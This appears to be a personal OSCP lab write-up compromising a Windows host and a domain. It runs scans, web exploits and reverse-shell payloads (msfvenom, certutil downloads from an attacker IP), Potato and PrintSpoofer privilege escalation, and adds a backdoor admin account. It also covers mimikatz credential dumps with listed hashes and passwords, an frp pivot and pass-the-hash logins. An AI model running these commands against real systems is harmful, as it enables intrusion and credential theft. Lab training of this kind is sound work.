OSCP-A
2025-3-29
Date: Mar 28, 2025
Tags: Credential Harvesting, Nmap, Web Application Security

Challenge 4 - Machine Credentials

DC01 (10.10.165.140): no credentials provided
MS01 (192.168.205.141): Eric.Wallows / EricLikesRunning800
MS02 (10.10.165.142): no credentials provided
Aero (192.168.205.143): no credentials provided
Crystal (192.168.205.144): no credentials provided
Hermes (192.168.205.145): no credentials provided

MS01(192.168.219.141)

Credentials

| Username | Hash | Password | From | For | Result |
| nurhodelta | $2y$10$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK | password | SQL File | N/A | Fail (image 1) |
| PHPSESSID = nka89v0l7i9e1omqcng50kh1ps (session cookie) | N/A | N/A | Script | Script | Success (image 2) |
| eppp | N/A | 65eDlL&fpDUL10 | Create | MS01(192.168.219.141) | N/A |
 

Nmap

nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 03:18 EDT
Warning: 192.168.219.141 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.219.141
Host is up (1.2s latency).
All 65535 scanned ports on 192.168.219.141 are in ignored states.
Not shown: 55110 open|filtered udp ports (no-response), 10425 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 155.99 seconds

nmap -sS -p- --min-rate 5000 -oO 192.168.219.141 nmap-sS.result
Nmap 7.94SVN scan initiated Fri Mar 28 03:19:13 2025 as: /usr/lib/nmap/nmap -sS -p- --min-rate 5000 -oO 192.168.219.141 nmap-sS.result
Nmap scan report for 192.168.219.141
Host is up (0.10s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3307/tcp  open  opsession-prxy
5040/tcp  open  unknown
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
51775/tcp open  unknown

nmap -Pn -n $ip -sC -sV -p22,80,81,135,139,445,3306,3307,5040,5985,47001,49664,49665,49666,49667,49668,49669,49670,51775 --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 03:58 EDT
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 52.63% done; ETC: 03:59 (0:00:23 remaining)
Nmap scan report for 192.168.219.141
Host is up (0.10s latency).

PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 e0:3a:63:4a:07:83:4d:0b:6f:4e:8a:4d:79:3d:6e:4c (RSA)
|   256 3f:16:ca:33:25:fd:a2:e6:bb:f6:b0:04:32:21:21:0b (ECDSA)
|_  256 fe:b0:7a:14:bf:77:84:9a:b3:26:59:8d:ff:7e:92:84 (ED25519)
80/tcp    open  http            Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
|_http-server-header: Apache/2.4.51 (Win64) PHP/7.4.26
81/tcp    open  http            Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
|_http-server-header: Apache/2.4.51 (Win64) PHP/7.4.26
135/tcp   open  msrpc           Microsoft Windows RPC
139/tcp   open  netbios-ssn     Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql           MySQL (unauthorized)
3307/tcp  open  opsession-prxy?
5040/tcp  open  unknown
5985/tcp  open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc           Microsoft Windows RPC
49665/tcp open  msrpc           Microsoft Windows RPC
49666/tcp open  msrpc           Microsoft Windows RPC
49667/tcp open  msrpc           Microsoft Windows RPC
49668/tcp open  msrpc           Microsoft Windows RPC
49669/tcp open  msrpc           Microsoft Windows RPC
49670/tcp open  msrpc           Microsoft Windows RPC
51775/tcp open  msrpc           Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.99 seconds

Things worth noting from the scan: ports 80 and 81 are two separate Apache/PHP 7.4.26 sites, 5985 is WinRM (used later with evil-winrm), MySQL on 3306 refuses unauthenticated connections, and SMB signing is enabled but not required on 445, which matters if an NTLM relay ever becomes an option.
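As an added example (not code from the original writeup), the following helper pulls the open TCP ports out of a saved `nmap -sS -p-` report and builds the follow-up `-sC -sV` command, so the port list does not have to be retyped by hand as it was above. SAMPLE_REPORT is constructed from the ports the scan found on 192.168.219.141; the function names and the `-oN nmap.txt` default are my choices, not anything from the page.

```python
"""Turn an `nmap -sS -p-` report into the port list for the service scan.
Added example; not part of the original writeup."""
import re
from typing import Dict

# One nmap port line: "<port>/<proto>  <state>  <service> [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)

# Constructed from the ports the writeup's full TCP scan reported on MS01.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.219.141
Host is up (0.10s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3307/tcp  open  opsession-prxy
5040/tcp  open  unknown
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
51775/tcp open  unknown
"""


def parse_open_ports(report: str, proto: str = "tcp") -> Dict[int, str]:
    """Map open port number -> service name for one protocol.
    Header lines and ports in any other state (closed, filtered,
    open|filtered) are skipped."""
    ports: Dict[int, str] = {}
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("proto") == proto and m.group("state") == "open":
            ports[int(m.group("port"))] = m.group("service")
    return ports


def port_arg(ports: Dict[int, str]) -> str:
    """Sorted, comma-separated list in the form nmap's -p option expects."""
    return ",".join(str(p) for p in sorted(ports))


def service_scan_command(target: str, report: str, outfile: str = "nmap.txt") -> str:
    """The same follow-up scan the writeup ran, built from the -p- report."""
    return (
        f"nmap -Pn -n {target} -sC -sV -p{port_arg(parse_open_ports(report))} "
        f"--open -oN {outfile}"
    )


if __name__ == "__main__":
    print(service_scan_command("192.168.219.141", SAMPLE_REPORT))
```

Feed it the real `-oN` file instead of SAMPLE_REPORT; the UDP report from the first scan yields an empty list because nothing there is in the plain `open` state.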

80

Important path:
http://192.168.205.141/script/

81

Important path:

http://192.168.205.141:81/db/

Screenshot of the db listing.
Admin credentials: nurhodelta : $2y$10$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK:password
(The $2y$10$ prefix is bcrypt at cost 10, what PHP's password_hash() produces; had the plaintext not been sitting next to it, this is hashcat mode 3200 / john --format=bcrypt.)
employees table

http://192.168.205.141:81/Admin/index.php

The account and password just found do not work here.

http://192.168.205.141:81/conn

SQL connection information (database credentials).

Exploit

Searching for this system turned up two public scripts: one is an SQL injection that bypasses the login, the other is an RCE that can return a reverse shell.
The first attempts all failed. Reading the script code showed it was a path problem; after fixing the path the script ran successfully.
But it seems I have no permission to reach other paths.
Try to get a stable shell and see whether that helps.
Modify the code here to see whether a reverse shell can be obtained.
Failed.
Went back to the web pages to look for other useful information.
Nothing there; still need to get things done through the shell.
After trying several kinds of shells, finally got one.
 

139


PE

The privilege list shows: SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
Since it is Enabled, we can try GodPotato for privilege escalation.
The web shell drops whenever the page request times out, so use an exe payload to get a proper shell instead.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.182 LPORT=1234 -f exe -o reverse.exe
certutil.exe -urlcache -split -f http://192.168.45.182:8000/reverse.exe reverse.exe
Got it.

SeImpersonatePrivilege exploitation

First, download GodPotato to abuse SeImpersonatePrivilege:
certutil.exe -urlcache -split -f http://192.168.45.182:8000/GodPotato-NET2.exe GodPotato-NET2.exe
Next, generate a reverse shell payload with msfvenom that connects back to the attacking machine:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.182 LPORT=2222 -f exe -o reverse_admin.exe
Then transfer the reverse shell executable to the target:
certutil.exe -urlcache -split -f http://192.168.45.182:8000/reverse_admin.exe reverse_admin.exe
Finally, run the payload through GodPotato to escalate:
GodPotato-NET2.exe -cmd reverse_admin.exe
After this sequence we should in theory have a SYSTEM (machine account) shell. However, the elevated shell was unstable and closed almost immediately after execution, which suggests trying another Potato variant for a more stable result.
So try adding an admin account instead:
GodPotato-NET2.exe -cmd "net user eppp 65eDlL&fpDUL10 /add"
GodPotato-NET2.exe -cmd "net localgroup Administrators eppp /add"
(Watch the & in the password: in a cmd.exe context it acts as a command separator, so if the same command is ever passed through cmd /c the password has to be quoted.)
runas could not be used to run commands as the new user: it prompts for the password on the console, and this non-interactive shell cannot feed it. Tried PsExec instead:
certutil.exe -urlcache -split -f http://192.168.45.182:8000/PsExec.exe PsExec.exe
Still no luck, other errors.
Tried another abuse tool:
certutil.exe -urlcache -split -f http://192.168.45.182:8000/PrintSpoofer64.exe PrintSpoofer64.exe
PrintSpoofer64.exe -i -c reverse_admin.exe
Success: now local admin (the shell PrintSpoofer spawns runs as SYSTEM).

Domain/Proxy Setting

Credentials

| Username | Hash | Password | From | For |
| celia.almeda | NTLM: e728ecbadfb02f51ce8eed753f3ff3fd | N/A | mimikatz | Domain |
| DefaultPassword | N/A | 7k8XHk3dMtmpnC7 | mimikatz | Domain |
| Mary.Williams | N/A | 69jHwjGN2bPQFvJ | mimikatz | Domain |
| N/A | N/A | hghgib6vHT3bVWf | local file | N/A |
| N/A | N/A | TreeFlaskDomestic505 | local file | Mysql |
| administrator | N/A | OSCP!@#4 | Changed | 192.168.215.141 |

(DefaultPassword is the Winlogon autologon secret; the account it belongs to is whatever DefaultUserName/DefaultDomainName hold under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.)

First use mimikatz to see whether there is any usable information:
certutil.exe -urlcache -split -f http://192.168.45.182:8000/mimikatz.exe mimikatz.exe

net user /domain

Enumerate domain users:
User accounts for \\DC01.oscp.exam

Administrator
Aimee.Hunt
Carol.Webb
celia.almeda
Chelsea.Byrne
Donna.Johnson
Emily.Bishop
eric.wallows
Frank.Farrell
Georgina.Begum
Guest
Jamie.Thomas
Jane.Booth
Janice.Turner
Joan.North
john.dorian
Kenneth.Coles
krbtgt
Lawrence.Kay
Leonard.Morris
Linda.Patel
Luke.Martin
Oliver.Gray
Sandra.Craig
Shane.Mitchell
sql_svc
Thomas.Robinson
tom.kinney
tom_admin
web_svc

File investigation

Found some password information in local files.

RDP Open

Proxy

To work more comfortably, set up a proxy with frpc and frps.
After that, all kinds of operations can be carried out from Kali.
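As an added example (the writeup only shows its frp setup as a screenshot, so this is not the author's configuration), here is an frp pair that gives Kali a SOCKS5 entry point into the 10.10.x.x network through MS01. It assumes frps runs on the Kali box at 192.168.45.182 (the address the payloads above call back to) and frpc runs on MS01; the control port 7000, the SOCKS port 1080, the token and the SOCKS credentials are values chosen here, not taken from the page.

```ini
; frps.ini -- on the attacking machine (Kali); start with: ./frps -c frps.ini
[common]
; port frpc connects to (assumed value)
bind_port = 7000
; shared secret so only our frpc can register a tunnel (assumed value)
token = ChangeMeLabToken

; frpc.ini -- on the compromised host (MS01); start with: frpc.exe -c frpc.ini
[common]
; Kali, reachable from MS01 on the 192.168.x.x side
server_addr = 192.168.45.182
server_port = 7000
token = ChangeMeLabToken

[socks5_pivot]
type = tcp
; opened on Kali; connections entering here leave from MS01 into 10.10.x.x
remote_port = 1080
plugin = socks5
; optional SOCKS authentication so nobody else in the lab rides the tunnel (assumed values)
plugin_user = pivot
plugin_passwd = ChangeMeToo
```

On Kali, point proxychains at it (`socks5 127.0.0.1 1080 pivot ChangeMeToo` in /etc/proxychains4.conf) and prefix the tools with `proxychains`, e.g. `proxychains evil-winrm -i 10.10.165.142 ...`. Tunnelling from the client outward means no inbound port has to be opened on MS01.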

MS02(10.10.165.142)

Nmap

nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 06:49 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.15 seconds
After scanning again, 5985 turned out to be open, so we try logging in directly with evil-winrm using the hash obtained earlier.

IP CHANGED

evil-winrm -i 10.10.175.142 -u celia.almeda -H e728ecbadfb02f51ce8eed753f3ff3fd
Got in.
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
Backup copies of these files were found; they give us the SYSTEM hive (needed for the boot key) and the SAM hive that holds the local account hashes.
python /usr/share/creddump7/pwdump.py SYSTEM SAM
We can see tom_admin, which is a domain admin, so we can log in with it directly.
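As an added example (not the writeup's own script), the helper below parses the pwdump-format lines creddump7's pwdump.py prints (user:rid:lmhash:nthash:::), discards accounts whose NT hash is the well-known empty-password hash, flags RID 500 as the built-in Administrator even if renamed, and emits the same evil-winrm pass-the-hash command the writeup used. SAMPLE_DUMP is constructed and its hashes are placeholders, not values from the lab. One caveat the writeup glosses over: a SAM hive only holds local accounts, so a hash taken from it works against the domain only where that password is reused.

```python
"""Pick pass-the-hash candidates out of pwdump-style SAM output.
Added example; not part of the original writeup."""
import re
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in pwdump format; the NT hashes are placeholders.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
this line is not a hash entry
"""

Entry = Dict[str, object]


def parse_pwdump(text: str) -> List[Entry]:
    """One dict per well-formed pwdump line; anything else is ignored."""
    entries: List[Entry] = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # not a user:rid:lm:nt line
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            continue  # malformed entry
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def pth_candidates(entries: List[Entry]) -> List[Entry]:
    """Drop accounts with the empty-password NT hash: useless for -H and
    usually disabled built-ins (Guest, DefaultAccount, ...)."""
    return [e for e in entries if e["nt"] != EMPTY_NT]


def is_builtin_admin(entry: Entry) -> bool:
    """RID 500 is the built-in Administrator regardless of its current name."""
    return entry["rid"] == 500


def evil_winrm_command(host: str, entry: Entry) -> str:
    """Pass-the-hash login over WinRM (5985), as used against MS02 above."""
    return f"evil-winrm -i {host} -u {entry['user']} -H {entry['nt']}"


if __name__ == "__main__":
    for e in pth_candidates(parse_pwdump(SAMPLE_DUMP)):
        tag = " (built-in Administrator)" if is_builtin_admin(e) else ""
        print(evil_winrm_command("10.10.175.142", e) + tag)
```

Run it on the real pwdump output instead of SAMPLE_DUMP; the LM field is always the empty marker on a modern Windows host, so only the NT hash is worth carrying forward.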

Domain Done
